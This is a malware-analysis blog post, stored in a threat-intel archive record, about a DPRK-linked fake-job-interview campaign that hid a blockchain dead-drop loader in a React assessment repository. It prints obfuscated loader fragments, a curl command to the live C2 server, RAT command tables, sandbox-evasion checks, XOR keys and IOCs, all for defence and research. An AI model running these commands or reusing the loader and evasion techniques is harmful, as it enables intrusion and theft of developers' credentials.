{
	"id": "876844df-f330-4abb-b4b1-43ba86985df3",
	"created_at": "2026-04-06T00:15:14.929365Z",
	"updated_at": "2026-04-10T13:13:04.822606Z",
	"deleted_at": null,
	"sha1_hash": "92b0c6c15f45346d730ce5b3b637fc63987040cc",
	"title": "How to Get Scammed (by DPRK Hackers)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5875057,
	"plain_text": "How to Get Scammed (by DPRK Hackers)\r\nBy OZ\r\nPublished: 2026-01-13 · Archived: 2026-04-05 22:42:56 UTC\r\n18 min read\r\nJan 13, 2026\r\nHello there,\r\nI am someone who is more than happy to accept your scam offer. For that, today we will discuss one of the scammer stories I have collected so far — a long journey involving malware that is said to be backed by DPRK threat actors.\r\nI won’t dive too deeply into tracing every single byte of the malware. Instead, I’ll link to researchers who have spent their time doing exactly that (shoutout to them). What we will focus on is the approach: how we can actually detect if something is a scam, because let’s face it — as developers we can’t live in a bubble refusing to accept anything from anyone.\r\nHopefully, this will be both fun and useful.\r\nThis campaign is tracked under multiple names by security researchers:\r\n- **DEV#POPPER** (Securonix) — The social engineering delivery method: fake job interviews targeting developers\r\n- **XCTDH** — Cross-Chain TxDataHiding: the blockchain-based technique for hiding payloads and laundering stolen crypto\r\n- **Contagious Interview** (Mandiant/GTIG) — The broader DPRK operation this falls under\r\nWe will be looking into:\r\n- The scammer’s approach and social engineering tactics\r\n- How to safely analyze suspicious code\r\n- The malware itself (spoiler: blockchain as a dropper — yes, really)\r\n- The full kill chain from obfuscated JS to the final payload\r\nStory Mode: The Social Engineering\r\nThe First Contact\r\nOur friend goes by the name SuperStar0420 on Discord. Already a red flag if you ask me — who picks that as a professional handle? 
He was recruiting React developers as “Director of Engineering at SolidBit.”\r\nhttps://medium.com/@0xOZ/how-to-get-scammed-by-dprk-hackers-b2f7588aea76\r\nPage 1 of 21\n\nWhen he first reached out, his message landed in my spam folder. I didn’t notice it until the end of November when I was cleaning things up. Blackhat MEA was coming up and I thought: why not have some fun before the conference?\r\nOne thing worth mentioning: I found him in both a PHP language Discord server and “Hunt Town” — a crypto Discord server. Crypto communities being used as hunting grounds? That’s red flag number one, FYI.\r\nThe “Legit” Company\r\nThe website he shared actually looks legit. It has content, an About page with team member names, the whole nine yards. The founder listed is “Max Almudhafar” — remember this name, it comes up later.\r\nNow, if we didn’t already know this was a scam, this would be our first checkpoint. You’d want to:\r\n- Search for the names listed in the About section\r\n- Click every button and check if social media accounts are real\r\n- Verify if those accounts actually link back to this website\r\nBut here’s the thing — the website might not even be related to our guy. He could have just grabbed a random company link and impersonated someone there. That’s the beauty (and danger) of social engineering.\r\nThey even had LinkedIn and Facebook pages. Effort was put in.\r\nThe Job Post and the Pressure\r\nOur star also shared a Workable job post, which looked decent:\r\nAlong the way, he insisted on picking me up regardless of how “bad” I was trying to be and said I don’t know React \u0026 programming. That persistence? Another red flag. 
Legitimate recruiters don’t chase candidates who seem disinterested — they have plenty of applicants.\r\nHe also shared a screenshot of an email supposedly from “Max” to his own email about the position, which was deleted later on before I could take a screenshot of it. This was odd. It made him look like another candidate trying to cheat the system, yet he was simultaneously claiming to be the one hiring. This confusion is intentional — it creates just enough doubt for victims to move forward with the process.\r\nLater, he shared the GitHub repository along with instructions to proceed. Here’s where he got impatient and sloppy. He was playing the role well until this point, but suddenly started giving specific instructions that felt off-track for a legitimate recruitment process.\r\nHe deleted several messages afterward, including the GitHub repo link. We’ll circle back to discuss the scammer himself at the end — first, let’s dig into the malware.\r\nThe GitHub Repository\r\nThe repository we received was: https://github.com/maxalmudhafar0210/react-technical-assessment\r\nAnd there it is — Max Almudhafar again, this time as the GitHub username. Whether this is the real founder’s name being abused or a persona the scammer created, the connection is clear.\r\nIt was removed later, but I got a local copy before it disappeared.\r\nAt the time it existed, there was one open issue and one pull request. The PR was interesting — it contained the push of the entire codebase that was already there. Seems like he didn’t know how to push properly at first. Unfortunately, I couldn’t capture the username of whoever created the PR, so I can’t confirm if it was a different account that could have led to another trail.\r\nThe open issue was from someone who came from Upwork — another victim who didn’t know it was a scam. 
The scammer’s Upwork account had been suspended, and this person opened a GitHub issue trying to reach out, thinking it was a legitimate process. I was able to explain the situation to them. Turns out they had actually executed the malware inside their Linux VM. I later sent him an email after looking into the malware; however, I am still waiting for a response from his end to see what happened with him. Lesson learned, I hope.\r\nRepository Structure\r\nLooking at the codebase, we have a typical-looking project:\r\nThe frontend contains an ASSESSMENT.md file—the \"technical exam\" instructions we're supposed to follow.\r\nI also checked the git logs and found an email address. Not sure if it’s actually related to the scammer or just some random value:\r\nFinding the Malware: The Safe Way\r\nHere’s my general approach when analyzing Node.js codebases for malware:\r\n1. Look into the package.json file\r\n2. Look into the entrypoint files\r\n3. Execute in a containerized environment and observe what happens\r\nThe package.json looked clean. The server.js (the first thing executed when running yarn start) also looked fine on quick review. Nothing suspicious—everything seemed okay, as if this wasn't a scam at all.\r\nBut here’s the thing: going through each file individually is not practical, and that’s exactly what the attacker is counting on. Instead of playing their game, I went straight to dynamic analysis.\r\nDocker + pspy: Trust Nothing, Observe Everything\r\nI spun up a Docker container and ran pspy (a process spy tool) inside it before doing anything else:\r\nWhy before npm install? Because malicious packages can execute code during installation, and dependency confusion attacks are real. 
I wanted to catch anything suspicious from the very first moment.\r\nUpon running yarn install, nothing happened. Good so far. But when I ran yarn start... things got interesting.\r\nI was doing this analysis weeks after receiving the malware (post-Blackhat), so I got a 404 error when it tried to reach out to its server. But that’s okay — I could see clearly that it was trying to contact express-project-ifm6fa.fly.dev. That's our scammer's staging server.\r\nAnd yes, I have a copy of what it would have returned — here’s the JSON response from that staging server:\r\nHunting Down the Trigger\r\nLooking at server.js, we have the following imports:\r\nimport express from 'express';\r\nimport cors from 'cors';\r\nimport dotenv from 'dotenv';\r\nimport { createRequire } from 'module';\r\nimport db from './config/database.js';\r\nimport { mockData } from './data/mockData.js';\r\nimport { errorHandler, notFound } from './middleware/errorHandler.js';\r\nimport authRoutes from './routes/authRoutes.js';\r\nimport productRoutes from './routes/productRoutes.js';\r\nimport categoryRoutes from './routes/categoryRoutes.js';\r\nimport orderRoutes from './routes/orderRoutes.js';\r\nimport reviewRoutes from './routes/reviewRoutes.js';\r\nimport cartRoutes from './routes/cartRoutes.js';\r\nTo narrow down where the malware lives, I did what any lazy (efficient) person would do: comment out everything and uncomment imports one by one until I find the culprit.\r\nLucky me — the malware was in the very first import I tested: database.js. 
My search didn't take long.\r\nThe Trigger: database.js\r\nInside database.js, there's a snippet that fetches data from an external URL. If that URL was still alive, it would return this JSON:\r\nSee that obfuscated JavaScript in the response? That’s the payload. The code reads data.data[6].description and then evals it. That's the trigger—executing arbitrary code fetched from an external server, disguised as an innocent database configuration.\r\nReversing the JS Malware\r\nNow we skip the storytelling and dive into the malware itself. I used AI assistance to speed up the deobfuscation process — no shame in working smarter.\r\nBefore we get into the weeds, here’s the full kill chain we’re about to unpack:\r\nStage 1: LCG Obfuscation\r\nFirst, I ran the obfuscated code through an online JS deobfuscator, which made it easier for me to go through it. Even though I can’t understand all these loops and variables, at least I know where to add console.log to move on.\r\nglobal[\"!\"] = \"7-test\";\r\nvar _$_1d32 = function (x, w) {\r\n  var d = x.length;\r\n  var a = [];\r\n  for (var o = 0; o \u003c d; o++) {\r\n    a[o] = x.charAt(o);\r\n  }\r\n  for (var o = 0; o \u003c d; o++) {\r\n    var z = w * (o + 370) + w % 42601;\r\n    var l = w * (o + 409) + w % 35742;\r\n    var j = z % d;\r\n    var f = l % d;\r\n    var h = a[j];\r\n    a[j] = a[f];\r\n    a[f] = h;\r\n    w = (z + l) % 3217160;\r\n  }\r\nThis is a Linear Congruential Generator (LCG) shuffling algorithm. It takes a string and a seed, then shuffles characters around using mathematical constants. 
Clever way to avoid standard Base64 signatures that security tools look for. How did I know that this is an LCG? I asked Gemini. My attitude was: whatever, just console.log the results.\r\nTo extract the next stage payload, I added console.log statements everywhere and executed it inside Docker. Being lazy is sometimes the solution:\r\nSo the first step goes like: Obfuscated =\u003e Deobfuscated. And there it is — another payload.\r\nStage 2: The Dead Drop Resolver\r\nSame deobfuscation process with the new payload:\r\nvar _$_a2a4 = _$af26993(\"%%AVe!_e_d2errdr%o6%7dTtp...\", 5085621);\r\nfunction _$af26993(t, m) {\r\n  var c = t.length;\r\n  // ... dictionary-based reconstruction ...\r\n  try {\r\n    a = i[_$_a2a4[27]][_$_a2a4[26]]((await c(\r\n      \"https://api.trongrid.io/v1/accounts/\" + t + _$_a2a4[24]\r\n    ))[_$_a2a4[7]][0][_$_a2a4[23]][_$_a2a4[7]], _$_a2a4[25])\r\n    // ... more obfuscation ...\r\n  } catch (t) {\r\n    a = (await c(\r\n      \"https://fullnode.mainnet.aptoslabs.com/v1/accounts/\" + e + _$_a2a4[30]\r\n    ))[0][_$_a2a4[29]][_$_a2a4[28]][0];\r\n  }\r\nNow this is where it gets interesting. Rather than manually unpacking everything, I had Gemini generate debugging probes that exposed the malware’s behavior in real time.\r\nWhat we found is a Dead Drop Resolver architecture. The malware doesn’t have hardcoded C2 server addresses. Instead, it:\r\n1. Queries specific Tron wallet addresses for “pointers”\r\n2. If Tron fails, falls back to the Aptos blockchain\r\n3. Uses those pointers (transaction hashes) to fetch encrypted payloads from Binance Smart Chain\r\nThe cleartext wallet addresses in the code aren’t decoys — they’re a fully functional dual-channel command infrastructure. 
If one blockchain gets blocked, the other takes over automatically.\r\nHere’s the key insight: the binary lacks any hardcoded payload locations. What it does have are high-entropy strings like 2[gWfGj... which are hardcoded XOR decryption keys. The location of the payload is dynamic (fetched at runtime), but the decryption capability is static.\r\nThis is clever. The attacker can rotate their hosting infrastructure endlessly without recompiling the malware.\r\nWallet Infrastructure\r\nThe malware queries these wallets with a filter like: /transactions?only_confirmed=true\u0026only_from=true\u0026limit=1\r\nThis fetches only the latest transaction sent from the wallet — which contains the pointer to the actual payload.\r\nChain | Wallet | Role\r\nTron | TFMudZvWCw96CCKKHGaDTXFXropp9TUJwG | Primary Signal (Stage 1)\r\nAptos | 0x76bee1c28ff29d6c414e38a5c11d03facec7bef251aca9c484ddfeb59a06dc37 | Backup Signal (Stage 1)\r\nTron | TPx5Rw3d5ohacK22aYGYTWi5Jpzhyyo1Vp | Primary Signal (Stage 2)\r\nAptos | 0x4a5301c04974d149212b23a4f99c8e0e2bab458d93e4f47e65057a9d5ea26515 | Backup Signal (Stage 2)\r\nAnd the backup one gives the same resulting payload.\r\nStage 3: Fetching the Payload from Binance\r\nThe pointer extracted from Tron/Aptos is a transaction hash on Binance Smart Chain. The malware connects to a BSC RPC node and requests the Input Data of that transaction:\r\nThat hex-encoded data is the actual payload location:\r\nWhen we look into Binance:\r\nThe payload itself is XOR-encrypted. 
Once decrypted, we get two execution paths:\r\n1. One payload executed via eval()\r\n2. Another spawned as a new node process (fileless execution)\r\nMy approach going through this is to add console.log() everywhere, and to update the eval() input from the previous results to my own modified payload with console.logs, so it's actually executing my own payload with the last step commented out until I replace it with the next code I have extracted, along with the modified previous code for debugging.\r\nStage 4: The Final Payload\r\nLooking at the eval’d payload (also available here):\r\nWe discover yet another layer with new wallet addresses:\r\nTron: TLmW5dMPTmtdgBKgKexc4uXZuvvEUU2DeF\r\nAptos: 0x7f66d0cf22f45f3cb39510dbef425b9728bea5159fe5c0a7a7d1f750ef2740bb\r\nThese point to: 0x828f00daa9fa68b36d2f2380f3fdc27265c53417ef01660b5421ea1125fad2de on Binance.\r\nThe final stage reaches out to an actual C2 server, where things start:\r\ncurl -X GET \"http://23.27.120.142:27017/$/boot\" \\\r\n  -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\" \\\r\n  -H \"Connection: close\"\r\nThis downloads an “ai engine” thing from GitHub, which at first I thought was just a decoy to confuse analysts. I was already annoyed by the amount of depth here and didn’t want to dig further.\r\nBut then I checked the Ransom-ISAC blog and found they went deeper — so I decided to take another look. I’d only analyzed one of the two malware paths anyway. 
Time to see what both payloads actually do.\r\nThe Final Payloads: What They Actually Do\r\nI used AI to summarize the two final payloads (the one executed via eval() and the one spawned as a node process). Both are part of the same campaign—they share XOR decryption keys and C2 infrastructure.\r\nPayload 1: Remote Access Trojan (RAT) / Backdoor\r\nIDE Persistence/Injection — This is nasty. It injects malicious code into:\r\n- VS Code (@vscode/deviceid/dist/index.js)\r\n- Cursor editor (same path pattern)\r\n- Uses markers /*C250617A*/ and /*C250618A*/ to track injected files\r\nC2 Communication — Connects via Socket.IO to 23.27.120.142:443\r\nRemote Command Execution — Supports multiple commands:\r\nCommand | Action\r\nss_info | Exfiltrate system info (version, paths, session)\r\nss_ip | Get victim\r\nss_upf | Upload files to attacker\r\nss_upd | Upload directories to attacker\r\nss_eval | Execute arbitrary JavaScript via eval()\r\nss_inz | Inject malware into a target file\r\nss_inzx | Remove injection from a file\r\n\u003cother\u003e | Execute via child_process.exec()\r\nData Exfiltration — Uploads files to http://23.27.120.142:27017/u/f\r\nPayload 2: Dropper/Loader with Anti-Analysis\r\nEnvironment Fingerprinting — Collects hostname, username, platform, kernel version. 
Detects cloud environments (AWS, Azure, GCP, Vercel, Amplify) and CI/CD systems.\r\nSandbox/Analysis Evasion — Blocks execution in:\r\n- AWS/Azure/GCP/Vercel cloud instances\r\n- Docker containers (detects by hostname patterns like [0-9a-f]{12})\r\n- Kali Linux (specifically blocks the kali hostname with root / kali / shellchocolat users)\r\n- CI/CD environments\r\n- WSL2 on Linux\r\nCredential/Environment Exfiltration — Sends all environment variables to \u003cC2\u003e/snv\r\nSecond-Stage Payload Delivery:\r\n- XOR-decrypted JavaScript (key: 4#uLeVM[3lESLGA) spawned as a detached Node process\r\n- Python loader fetches additional payload from \u003cC2\u003e/$/\u003cid\u003e using XOR decryption (key: 9KyASt+7D0mjPHFY)\r\n- Auto-installs Python if not present (downloads from C2 on Windows, installs pip on Linux)\r\nHow It Avoids Getting Caught\r\nThe sandbox detection is honestly impressive. They’re checking for:\r\nEnvironment | Check\r\nAWS | Username ubuntu/runner/root + kernel contains -aws/.amzn\r\nAzure | Username runner/codespace/azureuser + kernel contains -azure\r\nDocker | Hostname matches /^[0-9a-f]{12}$/ (container ID pattern)\r\nKali Linux | Hostname kali + user root/kali/shellchocolat\r\nCI/CD | Hostname patterns like build-*, buildkitsandbox, 1a-cicd-*\r\nWSL2 | Kernel contains microsoft-standard-WSL2\r\nThey also use a ReDoS-based debugger detection trick — if someone’s stepping through code with a debugger, the regex catastrophically backtracks and hangs.\r\nThe Attack Chain\r\nHere’s how it all fits together:\r\nnpm install \u003cmalicious-package\u003e\r\n  └─\u003e Loader/Dropper\r\n        • Fingerprints system\r\n        • Checks for sandbox\r\n        • Installs axios, socket.io-client\r\n        • Exfiltrates env vars to /snv\r\n        ├─\u003e XOR-decrypt + spawn Node payload\r\n        │     └─\u003e RAT/Backdoor\r\n        │           • Socket.IO C2\r\n        │           • Inject VS Code\r\n        │           • Remote shell\r\n        │           • File exfil\r\n        └─\u003e Download Python runtime if needed\r\n              └─\u003e Fetch XOR-encrypted Python payload from /$/\u003cid\u003e\r\n                    └─\u003e Execute decrypted Python (stage 3)\r\nIOCs from Final Payloads\r\nC2 Ports | 443, 27017\r\nEndpoints | /verify-human/, /snv, /u/f, /$/, /d/python.zip\r\nXOR Keys | 4#uLeVM[3lESLGA, 9KyASt+7D0mjPHFY\r\nPersistence | ~/.node_modules, VS Code/Cursor install paths\r\nFile Markers | /*C250617A*/, /*C250618A*/\r\nTL;DR — These are supply chain attack payloads that evade analysis environments, backdoor your IDE for persistence, establish C2 via Socket.IO, steal your env vars, and drop a Python second stage. Nasty stuff.\r\nThe “Triple-Chain” Architecture\r\nLet me break down why this infrastructure is so resilient:\r\nRole | Chain | Address | Purpose\r\nSignal (Primary) | Tron | TFMudZvWCw96CCKKHGaDTXFXropp9TUJwG | Points to payl\r\nSignal (Backup) | Aptos | 0x76bee1c28ff29d6c414e38a5c11d03facec7bef251aca9c484ddfeb59a06dc37 | Failover point\r\nSignal (Persist) | Tron | TPx5Rw3d5ohacK22aYGYTWi5Jpzhyyo1Vp | Secondary pers\r\nPayload Host | BSC | 0xfc229556e244e8155b4c0d02a82239038211c29a33ceb46065e03b08dbde1bcb | Hosts Encrypte\r\nPayload Host | BSC | 0x452ca1abcac0439c34b74f57b6d6e1ca90d4a7b22532347e4dc97a716b5e54e0 | Hosts Encrypte\r\nThe beauty (from an attacker’s perspective) is that blockchain data is immutable. You can’t ask Binance to delete a transaction. You can’t take down a Tron wallet. The infrastructure lives forever on public ledgers.\r\nA Note on the Obfuscation\r\nBoth Stage 1 and Stage 4 use LCG (Linear Congruential Generator) shuffling with different mathematical constants. 
I’ll be honest — I didn’t bother reading through the algorithm manually. I let AI handle that part and just focused on extracting the payloads. Sometimes the tool doesn’t matter as long as you get the job done.\r\nThe full debugging scripts I used are available here: https://gist.github.com/0x0OZ/46cc7e5c6c4a9c9dcc1cf95b30d780a8.\r\nBelieve me, you don’t want to take a look at my garbage scripts.\r\nThe Scammer: What We Know\r\nOur friend SuperStar0420 made some mistakes that exposed his identity — or at least gave us breadcrumbs to follow. Let’s see what we can piece together.\r\nDiscord OSINT\r\nI’m currently blocked by him on Discord (guess I was too annoying — probably regretted trying to scam me). But before that happened, we shared two mutual servers: Crypto Hunt and PHP DEVELOPERS, and later he joined one called CryptoDevs. I went through all his messages in these servers to understand him better.\r\nWhat these messages tell us:\r\n- Only two messages in Hunt Town server from 2024 — looking for job offers with what seems like AI-generated skill lists (probably lies)\r\n- This suggests he was looking for legitimate work back then\r\n- He jumped into crypto communities later, likely when he started scamming (PHP DEVELOPERS messages are from 2024, Hunt Town messages are from 2025)\r\nOne curious detail: in 2024 he was looking for a “male 20–34 not from India, Pakistan, Bangladesh” for some kind of “customization” work. That’s an oddly specific demographic filter. I wonder what that project actually was.\r\nTimeline of Scamming Operations\r\nWe also have messages from the C# Microsoft Discord server (which he’s no longer part of). 
These are dated June 8th, 2025 — which likely marks around when he started running these scams:\r\nUsername Trail\r\nAnother mistake: his Discord username. He used SuperStar0420 and later changed it to masterdev0420. I searched for other accounts with this handle:\r\nhttps://www.answeroverflow.com/u/1128366871020834858\r\nhttps://forum.plutonium.pw/user/superstar0420\r\nThese were the only results that seemed connected to the same person. Running Sherlock turned up other accounts, but they appeared to be different people using the same username — common enough that it wasn’t useful.\r\nOne interesting lead: I found an Instagram account that might have been his. When I asked him about it on Discord, his response was… not helpful. You can probably guess why I got blocked shortly after.\r\nWhat made me suspicious? He changed his Discord username just a few days after I asked about that picture. Coincidence? Maybe. Maybe not.\r\nInfrastructure Investigation\r\nFor the scam infrastructure itself, searching for the C2 IP 23.27.120.142 turned up several articles and Twitter threads sharing this IOC. 
Other teams have done deeper analysis that I'll link below.\r\nI ran an nmap scan against the IP to see what’s exposed:\r\nPORT      STATE SERVICE\r\n443/tcp   open  https\r\n3389/tcp  open  ms-wbt-server\r\n5985/tcp  open  wsman\r\n17500/tcp open  db-lsp\r\n27017/tcp open  mongod\r\nWhat we found:\r\nPort | Service | Finding\r\n443 | HTTPS | Everything returns 404—no interesting paths found\r\n3389 | RDP | Hostname: EV-4A6OE6M0E2D (looks auto-generated)\r\n5985 | WinRM | Windows Remote Management—interesting attack surface\r\n17500 | Dropbox LAN Sync | Unusual to see this exposed\r\n27017 | HTTP | Currently redirects /$/\u003cANYTHING\u003e to a GitHub raw file\r\nThe port 27017 redirect is curious — it points to:\r\nhttps://github.com/duanegoodner/xiangqigame/raw/refs/heads/main/prototypes/crtp_constructors/gist_crtp_constructors\r\nAccording to other researchers’ analysis, this GitHub account (duanegoodner) belongs to a non-real identity—likely a sock puppet account created by the threat actors. This suggests the repository isn't just a dead payload location, but potentially part of the next phase of the malware delivery chain. They're using GitHub as another layer of infrastructure, blending in with legitimate developer activity.\r\nThe Rotating Infrastructure\r\nThat random-looking RDP hostname — EV-4A6OE6M0E2D — caught my attention. I searched for it and found it appearing across multiple IPs in various malware reports. 
This tells us something important: the servers rotate, but the hostname fingerprint persists.\r\nSource | Link\r\nANY.RUN | https://any.run/report/b1032815b078aad59eb3bd32c29dee4621b37e516e679e84cb7d1c11c3eaff15/1b2b6ce6-2922-47b0-b62a-8897b78704eb\r\nMalware.lu | https://app.malware.lu/sample/23.27.120.142_3389_EV-4A6OE6M0E2D_2025-12-11_12-21-08/\r\nFileScan.io | https://www.filescan.io/uploads/68089ff790767142c3e16fc2/reports/13bdc659-5e29-4d45-ac06-10e3956cf148/strings\r\nRansom-ISAC (Part 3) | https://www.ransom-isac.com/blog/cross-chain-txdatahiding-crypto-heist-part-3/\r\nHybrid Analysis | https://hybrid-analysis.com/sample/9f8033bf9e669aa8043f46733f73dd933ebe06eb4bbf7b3ccef3520bf4921598/682e5a350df522832307b738\r\nShodan (23.27.13.242) | https://www.shodan.io/host/23.27.13.242\r\nURLQuery | http://urlquery.net/report/6656ec0f-b239-49d4-bb8e-0c6e2e4eef16\r\nTwitter (@skocherhan) | https://x.com/skocherhan/status/1984034926006825127\r\nTwitter (@skocherhan) | https://x.com/skocherhan/status/1978542223135576405\r\nShodan (108.165.100.36) | https://www.shodan.io/host/108.165.100.36\r\nThe pattern is clear: traditional C2 infrastructure (servers, IPs, hostnames) gets rotated regularly. The Tron wallet pointers also rotate as they update their campaigns. But the Binance wallet — that stays the same. The payload itself gets updated from time to time (the oldest transaction I found was 322 days old), but because of how the dead drop architecture works, they can push new malware versions to the same wallet address indefinitely. No hosting provider to file a takedown with. No domain to seize. Just immutable blockchain data, forever.\r\nFurther Reading \u0026 Attribution\r\nThis is where my personal investigation ends. I didn’t look into blockchain tracing or attempt to follow the wallet transactions — that’s a whole different level of headache and pain that I wasn’t willing to put myself through.\r\nHowever, I did reach out to the Ransom-ISAC team about the DPRK attribution claims. 
They broke down the evidence: the C2 addresses are dedicated IPs for DPRK infrastructure based in Vladivostok, the blockchain tracing intersects with wallets from DPRK-related campaigns like the Bybit hack, and the TxAddress technique matches what Mandiant/GTIG reported on.\r\nThis campaign fits the “Contagious Interview” pattern — a known DPRK initial access vector. The playbook includes fake job interviews via LinkedIn/Telegram/Discord, poor AI-based filter camera interviews, and the obfuscation techniques we saw in this malware. ISAC even shared a case where a victim reported the interviewer appeared as a White American, looked like someone of African descent on camera, spoke with a Far-East accent, and logged in from a Vietnamese IP. Classic OpSec failures from this threat actor group.\r\nRecommended Deep Dives\r\nThe Ransom-ISAC team published a fantastic multi-part analysis covering the full kill chain, additional IOCs, and detection rules:\r\n- Cross-Chain TxDataHiding Crypto Heist (Part 1)\r\n- Cross-Chain TxDataHiding Crypto Heist (Part 2)\r\n- Cross-Chain TxDataHiding Crypto Heist (Part 3)\r\n- Cross-Chain TxDataHiding Crypto Heist (Part 4)\r\nAdditional Resources\r\nType | Link\r\nTwitter Thread | https://x.com/skocherhan/status/1978530877467447667\r\nURLQuery Report | https://www.urlquery.net/report/ddff21e3-12b5-4b12-9048-5c7cfe8c3a0f\r\nJoe Sandbox Analysis | https://www.joesandbox.com/analysis/1796016/0/html\r\nMalva.re Report | https://app.malva.re/file/64cc940af0ebea2626d156bdac505c3c/report\r\nMalprob.io | https://malprob.io/report/e792b1d0079c491c821137ef4695ec26f76\r\n(Cloudflare Tunnel) | https://www.virustotal.com/gui/domain/cornwall-optimum-aviation-seekers.trycloudflare.com\r\nConclusion\r\nThis malware represents a modern evolution of botnet command-and-control. 
By abusing the immutable nature of public blockchains, the attacker ensures their payload cannot be deleted by hosting providers or law enforcement. Detection requires one of:\r\n1. Deep packet inspection of API calls to blockchain endpoints\r\n2. Host-based monitoring of process execution arguments\r\n3. Behavioral analysis watching for Node.js processes spawning with -e flags\r\nThe social engineering was decent but not perfect — the impatience gave it away. The technical infrastructure, however, was genuinely impressive. Blockchain-based dead drops are becoming more common, and this “Triple-Chain” architecture shows how threat actors are evolving.\r\nAs for SuperStar0420? He’s still out there, probably with a new username by now, hunting in crypto Discord servers for his next victim. The malware family is being actively tracked by multiple security teams, so hopefully the net is closing.\r\nStay paranoid, friends. And if someone on Discord offers you a “technical assessment” from a crypto-related server… maybe think twice.\r\nSource: https://medium.com/@0xOZ/how-to-get-scammed-by-dprk-hackers-b2f7588aea76",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://medium.com/@0xOZ/how-to-get-scammed-by-dprk-hackers-b2f7588aea76"
	],
	"report_names": [
		"how-to-get-scammed-by-dprk-hackers-b2f7588aea76"
	],
	"threat_actors": [
		{
			"id": "838f6ced-12a4-4893-991a-36d231d96efd",
			"created_at": "2022-10-25T15:50:23.347455Z",
			"updated_at": "2026-04-10T02:00:05.295717Z",
			"deleted_at": null,
			"main_name": "Andariel",
			"aliases": [
				"Andariel",
				"Silent Chollima",
				"PLUTONIUM",
				"Onyx Sleet"
			],
			"source_name": "MITRE:Andariel",
			"tools": [
				"Rifdoor",
				"gh0st RAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "110e7160-a8cc-4a66-8550-f19f7d418117",
			"created_at": "2023-01-06T13:46:38.427592Z",
			"updated_at": "2026-04-10T02:00:02.969896Z",
			"deleted_at": null,
			"main_name": "Silent Chollima",
			"aliases": [
				"Onyx Sleet",
				"PLUTONIUM",
				"OperationTroy",
				"Guardian of Peace",
				"GOP",
				"WHOis Team",
				"Andariel",
				"Subgroup: Andariel"
			],
			"source_name": "MISPGALAXY:Silent Chollima",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "4fc99d9b-9b66-4516-b0db-520fbef049ed",
			"created_at": "2025-10-29T02:00:51.949631Z",
			"updated_at": "2026-04-10T02:00:05.346203Z",
			"deleted_at": null,
			"main_name": "Contagious Interview",
			"aliases": [
				"Contagious Interview",
				"DeceptiveDevelopment",
				"Gwisin Gang",
				"Tenacious Pungsan",
				"DEV#POPPER",
				"PurpleBravo",
				"TAG-121"
			],
			"source_name": "MITRE:Contagious Interview",
			"tools": [
				"InvisibleFerret",
				"BeaverTail",
				"XORIndex Loader",
				"HexEval Loader"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "bc6e3644-3249-44f3-a277-354b7966dd1b",
			"created_at": "2022-10-25T16:07:23.760559Z",
			"updated_at": "2026-04-10T02:00:04.741239Z",
			"deleted_at": null,
			"main_name": "Andariel",
			"aliases": [
				"APT 45",
				"Andariel",
				"G0138",
				"Jumpy Pisces",
				"Onyx Sleet",
				"Operation BLACKMINE",
				"Operation BLACKSHEEP/Phase 3.",
				"Operation Blacksmith",
				"Operation DESERTWOLF/Phase 3",
				"Operation GHOSTRAT",
				"Operation GoldenAxe",
				"Operation INITROY/Phase 1",
				"Operation INITROY/Phase 2",
				"Operation Mayday",
				"Operation VANXATM",
				"Operation XEDA",
				"Plutonium",
				"Silent Chollima",
				"Stonefly"
			],
			"source_name": "ETDA:Andariel",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434514,
	"ts_updated_at": 1775826784,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/92b0c6c15f45346d730ce5b3b637fc63987040cc.pdf",
		"text": "https://archive.orkl.eu/92b0c6c15f45346d730ce5b3b637fc63987040cc.txt",
		"img": "https://archive.orkl.eu/92b0c6c15f45346d730ce5b3b637fc63987040cc.jpg"
	}
}